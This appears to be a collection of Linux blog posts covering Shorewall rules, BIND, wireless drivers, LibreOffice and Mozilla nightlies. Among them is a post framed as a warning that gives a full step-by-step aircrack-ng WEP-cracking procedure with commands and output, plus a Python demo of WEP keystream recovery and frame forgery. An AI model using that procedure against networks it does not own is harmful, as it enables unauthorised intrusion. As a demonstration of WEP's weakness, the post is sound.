#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
DROP net:1.2.3.4 all
DROP net:2.0.0.0/8 all
Ping(ACCEPT) net fw
ACCEPT net fw udp 123 -
ACCEPT net fw tcp 5000:5250 -
ACCEPT net fw tcp 50505 -
DNAT wan net:192.168.0.100 tcp 4000 - 192.168.1.50
DNAT wan net:192.168.0.100 udp 4000 - 192.168.1.50
DNAT wan net:192.168.0.100:6112 tcp 6118 - 192.168.1.50
DNAT wan net:192.168.0.100:6112 udp 6118 - 192.168.1.50
#LAST LINE -- DO NOT REMOVE

save the file and restart the firewall as You did before. Make sure that port 6112 (both TCP and UDP) is open on the 192.168.0.100 machine. How?

su -c "nmap -Pn -p 6112 192.168.0.100 && nmap -sU -Pn -p 6112 192.168.0.100"

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-09 18:43 GMT
Nmap scan report for wishmasus.loc (192.168.0.100)
Host is up (0.00012s latency).
PORT STATE SERVICE
6112/tcp open dtspc

Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-09 18:43 GMT
Nmap scan report for wishmasus.loc (192.168.0.100)
Host is up.
PORT STATE SERVICE
6112/udp open|filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 2.13 seconds

That’s it – You have just configured shorewall to Your liking.

Hint: Think of a firewall as a naughty kid – if You allow him to do something and then deny it – You know he will still do it… In other words the order of the rules / policies does matter. Deny first and ask questions later ;).
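Both the “DROP lines before ACCEPT lines” point above and this hint come down to first-match evaluation: the first rule whose source, destination, protocol and port all match decides, and only when no rule matches does the policy file apply. The Python below is an added example, not Shorewall code and not from this post: a simplified model of that evaluation over the rules and policies built up in this post (embedded as constructed strings; the range rule uses 2.0.0.0/8, which is what 2.*.*.* means, while a /24 would only cover 2.0.0.0 to 2.0.0.255), covering the Ping macro, port ranges, host-qualified zones and DNAT redirection. It ignores connection tracking and Shorewall’s sections, so treat its verdicts as an explanation of ordering, not a replacement for scanning with nmap from another machine as the post does.

```python
import ipaddress

# Constructed copies of the rules and policy files built up in this post.
RULES = """\
SECTION NEW
DROP net:1.2.3.4 all
DROP net:2.0.0.0/8 all
Ping(ACCEPT) net fw
ACCEPT net fw udp 123 -
ACCEPT net fw tcp 5000:5250 -
ACCEPT net fw tcp 50505 -
DNAT wan net:192.168.0.100:6112 tcp 6118 - 192.168.1.50
#LAST LINE -- DO NOT REMOVE
"""
POLICY = """\
fw net ACCEPT
net all DROP info
all all DROP info
"""


def parse_table(text):
    """Column lists of a Shorewall table file, minus comments and directives."""
    rows = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith(("?", "FORMAT ", "SECTION ")):
            continue
        rows.append(line.split())
    return rows


def packet(src_zone, src_ip, dst_zone, dst_ip, proto, dport=0):
    """Constructed packet summary: just the fields the matching needs."""
    return dict(src_zone=src_zone, src_ip=src_ip, dst_zone=dst_zone,
                dst_ip=dst_ip, proto=proto, dport=dport)


def zone_matches(spec, zone, ip):
    """Match 'net', 'all', 'net:1.2.3.4' or 'net:2.0.0.0/8' against a packet."""
    name, _, host = spec.partition(":")
    if name not in ("all", zone):
        return False
    if host:
        host = host.split(":")[0]            # drop a trailing :port (DNAT DEST syntax)
        return ipaddress.ip_address(ip) in ipaddress.ip_network(host, strict=False)
    return True


def port_matches(spec, dport):
    if spec == "-":
        return True
    lo, _, hi = spec.partition(":")          # single port or lo:hi range
    return int(lo) <= dport <= int(hi or lo)


def evaluate(rules_text, policy_text, pkt):
    """First matching rule wins; if no rule matches, the first matching policy wins."""
    for cols in parse_table(rules_text):
        cols += ["-"] * (7 - len(cols))      # pad the optional columns
        action, src, dst, proto, dport, _sport, orig_dest = cols[:7]
        if action.startswith("Ping("):       # Ping macro: ICMP echo-request, no port column
            action, proto = action[5:-1], "icmp"
        if not zone_matches(src, pkt["src_zone"], pkt["src_ip"]):
            continue
        if action == "DNAT":
            # DNAT matches the address the packet was sent to (ORIGINAL DEST column);
            # its DEST column is where the packet is redirected, not what it matches.
            if orig_dest != "-" and pkt["dst_ip"] != orig_dest:
                continue
        elif not zone_matches(dst, pkt["dst_zone"], pkt["dst_ip"]):
            continue
        if proto != "-" and proto != pkt["proto"]:
            continue
        if not port_matches(dport, pkt["dport"]):
            continue
        if action == "DNAT":
            target = dst.split(":")          # net:IP[:port]
            new_port = target[2] if len(target) > 2 else str(pkt["dport"])
            return ("DNAT", f"{target[1]}:{new_port}")
        return (action, "rule")
    for src, dst, pol, *_ in parse_table(policy_text):
        if src in ("all", pkt["src_zone"]) and dst in ("all", pkt["dst_zone"]):
            return (pol, "policy")
    return ("DROP", "no policy")


if __name__ == "__main__":
    fw = "192.168.0.100"
    for p in (packet("net", "192.168.0.1", "fw", fw, "tcp", 50505),
              packet("net", "1.2.3.4", "fw", fw, "tcp", 50505),
              packet("net", "192.168.0.1", "fw", fw, "tcp", 7634),
              packet("wan", "192.168.1.77", "fw", "192.168.1.50", "tcp", 6118)):
        print(p["src_ip"], p["proto"], p["dport"], "->", evaluate(RULES, POLICY, p))
```

Swapping the two DROP lines to the end of RULES and re-running the 1.2.3.4 case is the quickest way to see the naughty-kid problem: the ACCEPT for port 50505 matches first and the pest gets in.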

Hint: IF You are forwarding a port from machine 1 to machine 2 there is no need to open the port on machine 1. The DNAT rule will take care of that for You. You do, however, need to make sure that the port is open on machine 2. IF it’s not – check if the application that was supposed to open the port is running, and IF You are running shorewall on machine 2 as well, make sure that the appropriate rule was added to machine 2’s shorewall rules file.

Hint: Do not scan the ports from the same machine that You have configured firewall on – it will be considered as a local scan and firewall will not block ports.

Hint: IF You will run into a problem during the setup and firewall won’t start or restart use this command:

journalctl -xn

and read its output thoroughly. The answer to Your trouble is there.

Hint: If You want to test if shorewall is causing You trouble (blocks some port that You want to connect to) run:

systemctl stop shorewall && shorewall clear

This will stop the firewall and clear all its rules. IF after You did this You still cannot connect to the port on Your machine and it says it’s filtered or closed – look for the reason somewhere else…

Regards.

Andrzej

P.S. Breaking news… Someone actually reads this… This post has been translated (not very exactly I must say) to Polish by Wilczek. You can find it here.

Cracking WEP by AndrzejL aka one of the reasons why You SHOULD NEVER USE WEP TO SECURE YOUR ROUTER!

I have noticed (while connecting to my own AP) that many people around still use WEP encryption and I just felt dizzy… After I have counted to 10 I have decided to write this up:

Cracking WEP by AndrzejL aka one of the reasons why You SHOULD NEVER USE WEP to secure Your router!

This is NOT a “HOW TO CRACK WEP” tutorial. This is a warning. Warning that should be taken as “WOW! This WEP stuff is really not secure… I better change my router to personal WPA2 right away…”. Please do not use this knowledge to do illegal stuff. I used my own wireless router in my own wireless network for this demonstration. Breaking into WEP secured networks is illegal. You have been warned.

0) Install aircrack-ng-svn from ArchLinux AUR repository:

FIRST WINDOW:

1) Check the name of the wireless interface

iwconfig

says it’s wlan0

2) Check mac address of wlan0

ifconfig wlan0

says YY:YY:YY:YY:YY:YY

3) Optional – not necessary under Backtrack. Kill unnecessary network services that can mess You up:

airmon-ng check kill

Example:

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
23899   ifplugd
Killing all those processes…

4) Create wireless interface in monitor mode:

airmon-ng start wlan0

5) Check the name of the wireless monitor mode interface

iwconfig

says it’s mon0

6) Start sniffing to collect router’s data

airodump-ng mon0

Stop airodump with CTRL + C

Information gathered:

Router’s BSSID: XX:XX:XX:XX:XX:XX
Router’s ESSID: Arch_Linux_User

    INFO: If the ESSID contains spaces put it in "" or ' ' in the next commands, i.e. "Arch Linux User" or 'Arch Linux User'.

Router’s CHANNEL: ZZ

7) Kill mon0 interface:

airmon-ng stop mon0

8) Start mon0 fixed at the AP’s channel:

airmon-ng start wlan0 ZZ

9) Now re-write Your sniffing command so it sniffs the right channel / bssid and so it saves the captured packets into a file:

airodump-ng -c ZZ --bssid XX:XX:XX:XX:XX:XX -w ./output mon0

    IF You get "Fixed channel mon0: -1" in the right hand corner of the sniffer – then rewrite Your command again by adding --ignore-negative-one so it looks like this:

airodump-ng -c ZZ --bssid XX:XX:XX:XX:XX:XX  --ignore-negative-one -w ./output mon0

    Leave this command running and saving packets.

SECOND WINDOW:

10) Check if the card is capable of packet injection:

aireplay-ng -9 mon0

    16:10:47  Injection is working!

11) Try to auth with router:

aireplay-ng -1 0 -e Arch_Linux_User -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY mon0

    if You get this error:

16:20:36 Waiting for beacon frame (XX:XX:XX:XX:XX:XX) on channel -1
15:38:33  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch.

    just rewrite Your command by adding the "--ignore-negative-one" switch.

Example:

aireplay-ng -1 0 -e Arch_Linux_User -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY --ignore-negative-one mon0

This command will (should) auth You with a router and then give You the prompt back.

0 – this can take a value between 0 and 512 (experiment)
-e router’s ESSID
-a router’s BSSID
-h Your card’s MAC address
--ignore-negative-one fixes the above mentioned error

IF You want to stop this command use CTRL + C

16:16:28  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel -1

16:16:28  Sending Authentication Request (Open System) [ACK]
16:16:28  Authentication successful
16:16:28  Sending Association Request [ACK]
16:16:28  Association successful 🙂 (AID: 1)

🙂 now fiddle with the “0” in the command – change it’s values to something between 1 and 512.

Example:

aireplay-ng -1 1 -e Arch_Linux_User -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY --ignore-negative-one mon0

    Leave this command running.

THIRD WINDOW:

12) Start to inject:

aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY mon0

    If You get these errors:

16:21:36  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel -1
16:21:36  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).

    rewrite the command by adding the "-e Arch_Linux_User" and "--ignore-negative-one" switches.

Example:

aireplay-ng -3 -e Arch_Linux_User -b XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY --ignore-negative-one mon0

Meanwhile You can (but You do not have to) fiddle with the aireplay-ng “-1” command in the second window. Change the value of “0” to different values between 1 and 512 – see which is better for You… Sometimes 1 will do juuuust fine.

    After a while You _should_ receive ARP request packet… and… START TO INJECT THEM.

FOURTH WINDOW:

13) When You have collected some ARP packets (the PTW attack used by -z typically needs tens of thousands of IVs for a 104-bit key, so the more the better) You can start the cracking process:

aircrack-ng -z ./output*.cap

and soon after that You should be able to see this sort of message:

KEY FOUND! [ 2C:BD:3D:AC:D5:97:59:57:28:CE:3C:B9:F5 ]
Decrypted correctly: 100%

That’s it… You’re all done…

It takes less than 5 minutes to crack a WEP key… 5 minutes guys and girls… and Your wireless network has been compromised… Now please tell me that You have changed the default administrator’s password for the router? Please please tell me You did at least that…
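Why it takes five minutes, as an added example that is not code from this post or from the aircrack-ng project: the toy WEP implementation below (Python; the MAC and IP addresses are constructed, the key is the one aircrack-ng found above) shows the two properties the steps above rely on. An ARP request has a fixed size and a predictable plaintext, so from one captured frame the attacker recovers the RC4 keystream for that frame’s IV (these per-IV keystream bytes are exactly what the PTW attack feeds its statistics), and because the IV is only 24 bits the replay flood forces the router to hand them out by the tens of thousands. The same keystream also lets an attacker forge a brand new frame under that IV which the router accepts, because the ICV is an unkeyed CRC32.

```python
"""Toy model of WEP's RC4 framing, to show why the ARP replay above works
and why the capture cracks in minutes.

Added example for this post; not code from the page or from aircrack-ng.
Frame layout follows WEP (3-byte IV || key-id || RC4_{IV||key}(payload || CRC32
ICV)); the MAC and IP addresses are constructed, the key is the one found above.
"""
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling followed by `length` bytes of keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity value: a plain CRC32, little-endian, no key involved."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body as sent on the air: IV || key-id || RC4(plaintext || ICV)."""
    body = plaintext + icv(plaintext)
    return iv + b"\x00" + xor(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    """What the AP does: strip the IV, decrypt, accept only if the ICV checks."""
    iv, body = frame[:3], frame[4:]
    pt_icv = xor(body, rc4_keystream(iv + key, len(body)))
    pt, got = pt_icv[:-4], pt_icv[-4:]
    return pt, got == icv(pt)


# LLC/SNAP header that precedes every ARP payload on 802.11: always known.
SNAP_ARP = bytes.fromhex("aaaa030000000806")


def arp_request(sender_mac: bytes, sender_ip: bytes, target_ip: bytes) -> bytes:
    """Minimal ARP request body (fixed size: 8 + 28 = 36 bytes)."""
    header = struct.pack(">HHBBH", 1, 0x0800, 6, 4, 1)  # Ethernet, IPv4, opcode 1
    return SNAP_ARP + header + sender_mac + sender_ip + b"\x00" * 6 + target_ip


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext attack: ciphertext XOR plaintext is the keystream for
    this IV, including the four bytes that covered the ICV."""
    return xor(frame[4:], known_plaintext + icv(known_plaintext))


def forge_frame(iv: bytes, keystream: bytes, plaintext: bytes) -> bytes:
    """Encrypt new data under a captured IV without ever learning the key."""
    body = plaintext + icv(plaintext)
    if len(body) > len(keystream):
        raise ValueError("need more keystream bytes than were recovered")
    return iv + b"\x00" + xor(body, keystream[: len(body)])


def demo() -> dict:
    key = bytes.fromhex("2cbd3dacd597595728ce3cb9f5")  # 104-bit key from the crack above
    iv = b"\x01\x02\x03"  # 24-bit IV: the AP must reuse IVs after at most 2**24 frames
    client_mac = bytes.fromhex("001122334455")  # constructed address
    client_ip, gateway_ip = bytes([192, 168, 0, 102]), bytes([192, 168, 0, 1])
    victim_ip = bytes([192, 168, 0, 50])

    # 1. A legitimate client ARPs for the gateway; the attacker sniffs the frame
    #    and, like aireplay-ng -3, recognises it as ARP by its fixed size.
    known = arp_request(client_mac, client_ip, gateway_ip)
    captured = wep_encrypt(key, iv, known)

    # 2. Because the plaintext is predictable, the keystream for this IV leaks.
    keystream = recover_keystream(captured, known)

    # 3. That keystream encrypts any frame of the same length under this IV and
    #    the AP cannot tell it from a real one: the ICV is only a CRC.
    forged_plain = arp_request(client_mac, client_ip, victim_ip)
    forged = forge_frame(iv, keystream, forged_plain)
    decrypted, accepted = wep_decrypt(key, forged)

    return {
        "keystream_bytes": len(keystream),
        "forged_accepted": accepted,
        "forged_matches": decrypted == forged_plain,
        "replayed_accepted": wep_decrypt(key, captured)[1],  # a plain replay is valid too
    }


if __name__ == "__main__":
    print(demo())
```

demo() returns the verdicts the router would give for the replayed and the forged frame; nothing in it talks to a wireless card. The point to take away is that no amount of re-keying helps: any network still running WEP should be treated as an open network.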

Cheers.

AndrzejL

[PCLinuxOS] Manually upgrading Bind / Named to version 9.9.2-P2 [Security patches].

Hi folks.

Latest Bind / Named version was released several days ago to patch this vulnerability.

I will try to show how to download, extract, configure and install the latest version. ISC signs its release tarballs with PGP, so verify the signature of the downloaded archive before You build and install anything as root.

Open terminal window and follow this set of instructions:

su

root's password

export PREFIX=/usr

export PATH=$PREFIX/bin:$PATH

export PKG_CONFIG_PATH=$PREFIX/lib/pkgconfig:$PREFIX/share/pkgconfig

cd /opt/

mkdir Bind

cd Bind

wget -c ftp://ftp.isc.org/isc/bind9/9.9.2-P2/bind-9.9.2-P2.tar.gz

tar xvzf ./bind-9.9.2-P2.tar.gz

cd bind-9.9.2-P2

./configure --prefix=$PREFIX --sysconfdir=/etc/

You can expect missing dependencies here. I had no problems whatsoever as I have a good few “devel” packages installed. If You do run into a snag, work out what You are missing, install it from Synaptic (without closing this window) and re-run the configure step above until there are no errors.

make

make install

ls --full /var/lib/named/var/

one of the listed items should look like this:

drwxr-xr-x 7 root root 4096 2013-03-22 09:08:02.163308440 +0100 named/

ls --full /var/lib/named/var/named

lists the daemon’s working directory. After the install it is owned by root (see above), so hand it back to the named user:

chown named:named /var/lib/named/var/named/

ls --full /var/lib/named/var/

and the entry should now look like this:

drwxr-xr-x 7 named named 4096 2013-03-22 09:08:08.221303100 +0100 named/

Now in this terminal window type in

named -v

the reply should look like this:

BIND 9.9.2-P2

service named restart

and the reply should look something like this:

Stopping named: [ Failed ]
Starting named: [ OK ]

This should be it… You have compiled and are running the latest patched version of Bind… Two caveats: because the build went into --prefix=/usr it replaced the files from the distribution package, so the next bind update from Synaptic will overwrite them again with whatever version the repo ships, and named -v only tells You which binary is first in Your PATH. The “Stopping named: [ Failed ]” above means the init script could not stop the old daemon cleanly, so check that the daemon actually answering queries reports the new version (a version.bind query in the CHAOS class will tell You) instead of trusting the [ OK ].

Regards.

Andy

Solving the ieee80211 xyz0: abc0: No probe response from AP xx:yy:zz:aa:bb:cc after 500ms, disconnecting – wireless dropouts.

Hi all.

I have this Belkin rt73usb card – it’s connected to this SUPER OLD Thinkpad 600E machine and it’s always associated with only one router – static IP setup – basically the laptop is stationary / not moved. I had a few problems with connecting it to the network at boot time but thanks to Boohbah from the #Archlinux channel and a bit of research I got it to connect, to turn off power management and to keep the rate “fixed” at 54M – worked well BUT… I had a problem with it – the connection stayed up – I could browse the internet from the Thinkpad / I could access the sshfs share on my server (from the Thinkpad 600E) and so on, but after a while the sshd port – 50505 in my case – was switching from open to filtered and I could not connect to it anymore.

Example – I rebooted the Thinkpad 600E – I could connect – the Thinkpad was left alone for, let’s say, sometimes 10 minutes, sometimes an hour – the connection was active but I could not ssh to the machine anymore.

After a bit of investigating I found this line in dmesg (after the connection dropped):

ieee80211 xyz0: abc0: No probe response from AP xx:yy:zz:aa:bb:cc after 500ms, disconnecting

and I googled it but could not find a solution, so I asked for help on the Arch Linux forum and Strike0 sorted me out in no time. Thanks Dude!

I am reposting the info here just in case the forum post goes missing in the future. To solve this issue I had to do this:

As root add:

options rt73usb nohwcrypt=1

to the file:

/etc/modprobe.d/modprobe.conf

and save it. Then regenerate the initramfs image (mkinitcpio copies the modprobe.d configuration into it, so the option also applies if the module is loaded early) with

mkinitcpio -p linux

and reboot.

Hope someone will find it useful in the future.

Regards.

Andrzej

[UPDATED] Bloody RT73 USB dongle wouldn’t connect at boot time.

Hi all.

I own this dongle:

Bus 001 Device 003: ID 148f:2573 Ralink Technology, Corp. RT2501/RT2573 Wireless Adapter

It’s plugged into my “stationary” IBM Thinkpad 600E laptop. Only one network. Static IP. It would connect to the internet once the system had booted fully, but not during boot.

BIG thanks to Boohbah, he sorted me out when I was losing all hope…

To solve this issue I had to do this (as root):

Create two files:

/etc/systemd/system/network@wlan0.service

With content:

[Unit]
Description=Network Connectivity (%i)
Wants=network.target
Before=network.target
BindsTo=sys-subsystem-net-devices-%i.device
After=sys-subsystem-net-devices-%i.device

[Service]
Type=oneshot
RemainAfterExit=yes
EnvironmentFile=/etc/conf.d/network
ExecStart=/sbin/ip link set dev ${interface} up
ExecStart=/usr/sbin/wpa_supplicant -B -i ${interface} -c /etc/wpa_supplicant.conf
ExecStart=/sbin/ip addr add ${address}/${netmask} broadcast ${broadcast} dev ${interface}
ExecStart=/sbin/ip route add default via ${gateway}
ExecStart=/usr/sbin/iwconfig ${interface} power off
ExecStart=/usr/sbin/iwconfig ${interface} rate 1M fixed
ExecStop=/sbin/ip addr flush dev ${interface}
ExecStop=/sbin/ip link set dev ${interface} down

[Install]
WantedBy=multi-user.target

and

/etc/conf.d/network

with content:

interface=wlan0
address=192.168.0.102
netmask=24
broadcast=192.168.0.255
gateway=192.168.0.1

Your IP / gateway may vary. The /etc/wpa_supplicant.conf referenced by the unit holds the network’s pre-shared key, so make sure it is readable by root only. You will also have to edit the file:

/etc/resolv.conf

So it contains DNS servers that You’re using. Example:

nameserver 192.168.0.1

and then enable service:

systemctl enable network@wlan0.service

and reboot.

After the reboot my card was connected.

[root@wishthinkpad andrzejl]# journalctl -b | grep wlan0
Jan 05 04:31:50 wishthinkpad.loc systemd[1]: Expecting device sys-subsystem-net-devices-wlan0.device…
Jan 05 04:32:03 wishthinkpad.loc systemd[1]: Starting Network Connectivity (wlan0)…
Jan 05 04:32:03 wishthinkpad.loc kernel: IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready
Jan 05 04:32:04 wishthinkpad.loc systemd[1]: Started Network Connectivity (wlan0).
Jan 05 04:32:06 wishthinkpad.loc kernel: wlan0: authenticate with 00:18:39:a0:db:3e
Jan 05 04:32:06 wishthinkpad.loc kernel: wlan0: send auth to 00:18:39:a0:db:3e (try 1/3)
Jan 05 04:32:06 wishthinkpad.loc kernel: wlan0: authenticated
Jan 05 04:32:06 wishthinkpad.loc kernel: rt73usb 1-1.1:1.0: wlan0: disabling HT as WMM/QoS is not supported
Jan 05 04:32:06 wishthinkpad.loc kernel: wlan0: associate with 00:18:39:a0:db:3e (try 1/3)
Jan 05 04:32:06 wishthinkpad.loc kernel: wlan0: RX AssocResp from 00:18:39:a0:db:3e (capab=0x411 status=0 aid=1)
Jan 05 04:32:06 wishthinkpad.loc kernel: wlan0: associated
Jan 05 04:32:06 wishthinkpad.loc kernel: IPv6: ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready
[root@wishthinkpad andrzejl]#

Thanks again Boohbah I wouldn’t be able to solve that without You.

Hopefully someone else can use it in the future.

Regards.

Andrzej

EDIT 01: Adding pci=noacpi as a kernel parameter seems to make this temperamental USB device behave slightly better…
EDIT 02: Power management needs to be disabled and the rate must be brought down to 1M, otherwise the card disconnects AND loses pings.

Cool trick – speeding up LibreOffice by pre-loading it during boot.

Hi all.

I have decided to speed up opening of the LibreOffice and its components by pre-loading it after I log into my system.

This is not a trick for people with low-RAM machines. Why? It pre-loads LibreOffice at login and keeps it in memory, so unless You are willing to sacrifice something between 64 and 256 MB of RAM – this how-to is not for You.

Still interested? Great. Do this:

Open terminal and run those commands:

touch ~/.config/autostart/preload_libreoffice.sh

chmod +x ~/.config/autostart/preload_libreoffice.sh

mcedit ~/.config/autostart/preload_libreoffice.sh

Now copy this:

#!/bin/sh
# Wait for the desktop to settle, then start LibreOffice with no document
# and no splash screen so that its libraries get read into the page cache.
sleep 15
loffice --nodefault --nologo &
PID=$!
# Give it time to load, then quit it; the cached files make the next start fast.
sleep 10
kill $PID

Click on the mcedit window and press SHIFT + INS(ERT). Content of the clipboard should now be pasted into the mcedit. Now press F2 to invoke saving dialog. Now press F10 to invoke closing dialog.

Mcedit - Saving the script

Close the terminal and open any part of LibreOffice (Writer, Calc, Draw, whatever ails you…) and click Tools > Options from the menu bar. Now in the LibreOffice section find and click Memory. See the “Use for LibreOffice” box? Change its value to something like 64, 128 or 256. Now OK the Options window and close LibreOffice.

LibreOffice - Memory Settings

Now reboot Your machine and log into it. Give it some time (15 seconds) to run the script in the background and try opening a LibreOffice component… It should start in less than 1 second.

Regards.

Andrzej

Playing DVD Videos in SMPlayer. Adding SMPlayer entry in KDE’s Device Notifier.

Hi folks.

I have installed Arch Linux few days ago. I am loving it.

By default SMPlayer won’t play DVD videos, nor will it have an entry in the KDE4 Device Notifier to do so. Here is how I got it to work:

I assume You have a fully upgraded system.

Run this:

su

Now give it root’s password.

Now run this:

pacman -S smplayer libdvdcss libdvdnav libdvdread

and agree to install all the packages and their dependencies.

Now run this:

mcedit /etc/udev/rules.d/82-cdrom.rules

and paste this as a content:

SUBSYSTEM=="block", KERNEL=="sr0", SYMLINK+="cdrom cdrw dvd dvdrw"

Big thank You to sudokode for helping me with the udev rule.

Now save the file and close editor (F2 to save, F10 to exit). You can use any other text editor like vi, nano etc.

Now if You’re not using KDE4 and You do not need or want the Device Notifier entry You can reboot. SMPlayer will be able to play Your dvd videos now.

For those that want and need the Device Notifier entry please continue in the same terminal.

Run this:

mkdir -p /usr/share/apps/solid/actions/

mcedit /usr/share/apps/solid/actions/smplayer_play_dvd.desktop

and paste this:

[Desktop Entry]
Type=Service
Actions=PlayDVD;
X-KDE-Solid-Predicate=OpticalDisc.availableContent & 'VideoDvd'
[Desktop Action PlayDVD]
Name=Play DVD with SMPlayer
Exec=smplayer dvd://%U
Icon=smplayer

Now save the file and close editor (F2 to save, F10 to exit). You can use any other text editor like vi, nano etc.

Reboot Your machine.

Now when You insert a DVD disc into the drive, Device Notifier will ask You what You want to do. One of the options should be “Play DVD with SMPlayer”.

Regards.

Andrzej

Testing Mozilla Thunderbird Central Daily 20 safely on PCLinuxOS 2012.x

Hi all.

I wanted to test the latest version of the e-mail client from Mozilla. I am a huge fan of Thunderbird and it has always been my main e-mail client. PCLinuxOS comes with the latest stable version. It’s a good thing. I love the stability of my distribution. However I want to try the newest Mozilla product before it becomes the default for PCLinuxOS. Also I want to help Mozilla developers by filing bug reports and make their products even better this way.

Here are few simple steps You can do if You want to test it too.

Thunderbird is the default PCLinuxOS e-mail client so it is installed by default. If You removed it – reinstall it via Synaptic.

The older version must stay installed for a few minor yet important reasons.

Close Thunderbird completely. Now open console and run these commands:

cd

Go to Your home folder.

This version of Thunderbird is a bleeding edge release so the ride might be a little bumpy. I never noticed any problems but just to be on the safe side…

cp -R ~/.thunderbird ~/.thunderbird.backup.20

Let’s back up Your profile first.

wget -c http://ftp.mozilla.org/pub/mozilla.org/thunderbird/nightly/latest-comm-central/thunderbird-20.0a1.en-US.linux-i686.tar.bz2

Download the compressed Daily XX file.

tar -xvjf ./thunderbird-20.0a1.en-US.linux-i686.tar.bz2

Extract it.

rm -f ./thunderbird-20.0a1.en-US.linux-i686.tar.bz2

Remove it.

su

Gain root privileges…

root password

…by giving correct root password.

rm -f /usr/bin/thunderbird

Remove old executable.

rm -f /usr/bin/mozilla-thunderbird

Remove old executable.

ln -s /home/yourlogin/thunderbird/thunderbird /usr/bin/thunderbird

Create a symlink to the new executable in Your home folder. Replace yourlogin with Your actual login. Keep in mind that /usr/bin/thunderbird now points at a file that anything running as Your user can overwrite, so never run it as root.

ln -s /home/yourlogin/thunderbird/thunderbird /usr/bin/mozilla-thunderbird

Create the second symlink, pointing at the same launcher (the extracted tarball ships a single launcher called thunderbird; there is no mozilla-thunderbird in it). Replace yourlogin with Your actual login.

exit

exit

Go back to user mode and close the console.

Now You can use the old shortcuts (from the desktop, panel or KMenu) to open the new Thunderbird. All programs should open mailto: links in the new version of Thunderbird too.

Enjoy the latest and the greatest from Mozilla. I am. If You are using Daily You should know that it can also be safely upgraded to the latest version by using Help > About Daily from the Thunderbird menu bar.

Thunderbird 20 Daily on PCLinuxOS 2011.x

Going back to the repo version of Thunderbird.

Close Thunderbird completely. Reinstall Thunderbird using Synaptic.

Regards.

Andy

Testing Mozilla Firefox Nightly 20 safely on PCLinuxOS 2012.x

Hi all.

I wanted to test the latest browser from Mozilla. I am a huge fan of Firefox and it has always been my main browser. PCLinuxOS comes with the latest stable version. It’s a good thing. I love the stability of my distribution. However I want to try the newest Mozilla product before it becomes the default browser for PCLinuxOS. Also I want to help Mozilla developers by filing bug reports and make their products even better this way.

Here are few simple steps You can do if You want to test it too.

Firefox is the default PCLinuxOS browser so it is installed by default. If You removed it – reinstall it via Synaptic.

The older version must stay installed for a few minor yet important reasons.

Close Firefox browser completely. Now open console and run these commands:

cd

Go to Your home folder.

cp -R ~/.mozilla ~/.mozilla.backup.20

Let’s back up Your profile first.

wget -c http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-trunk/firefox-20.0a1.en-US.linux-i686.tar.bz2

Download the compressed Nightly XX file.

tar -xvjf ./firefox-20.0a1.en-US.linux-i686.tar.bz2

Extract it.

rm -f ./firefox-20.0a1.en-US.linux-i686.tar.bz2

Remove it.

cd ~/firefox/searchplugins/ && wget -c http://andrzejl.cyryl.net/WoTW/WoTW_files/FFxSearchPCLOSForum/pclinuxos-forum.xml

Add the search engine for the PCLinuxOS Forum.

su

Gain root privileges…

root password

…by giving correct root password.

rm -f /usr/bin/firefox

Remove old symlink.

rm -f /usr/bin/mozilla-firefox

Remove old symlink.

ln -s /home/yourlogin/firefox/firefox /usr/bin/firefox

Create the new symlink. Replace yourlogin with Your actual login. Keep in mind that /usr/bin/firefox now points at a file that anything running as Your user can overwrite, so never run it as root.

ln -s /home/yourlogin/firefox/firefox /usr/bin/mozilla-firefox

Create the second symlink. Replace yourlogin with Your actual login.

exit

exit

Go back to user mode and close the console.

Now You can use the old shortcuts (from the desktop, panel or KMenu) to open the new Firefox. All programs should open links in the new version of Firefox too.

Enjoy the latest and the greatest from Mozilla. I am. If You are using Nightly You should know that it can also be safely upgraded to the latest version by using Help > About Nightly from the Firefox menu bar.

Firefox 20 Nightly on PCLinuxOS 2011.x

Going back to the repo version of Firefox.

Close Firefox completely. Reinstall Firefox using synaptic.
